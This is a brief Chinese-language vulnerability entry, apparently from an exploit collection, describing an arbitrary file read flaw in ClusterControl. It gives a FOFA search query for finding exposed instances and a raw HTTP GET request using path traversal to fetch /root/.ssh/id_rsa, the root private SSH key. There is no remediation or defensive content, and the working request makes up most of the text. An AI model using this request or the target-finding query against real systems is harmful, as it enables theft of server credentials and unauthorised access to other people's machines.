ClusterControl存在任意文件读取漏洞
一、漏洞简介
ClusterControl存在任意文件读取漏洞
二、影响版本
- ClusterControl
三、资产测绘
- fofa
title="ClusterControl v2" - 特征
四、漏洞复现
GET /../../../../../../../../..//root/.ssh/id_rsa HTTP/1.1
Host:
Accept-Encoding: identity
User-Agent: python-urllib3/1.26.4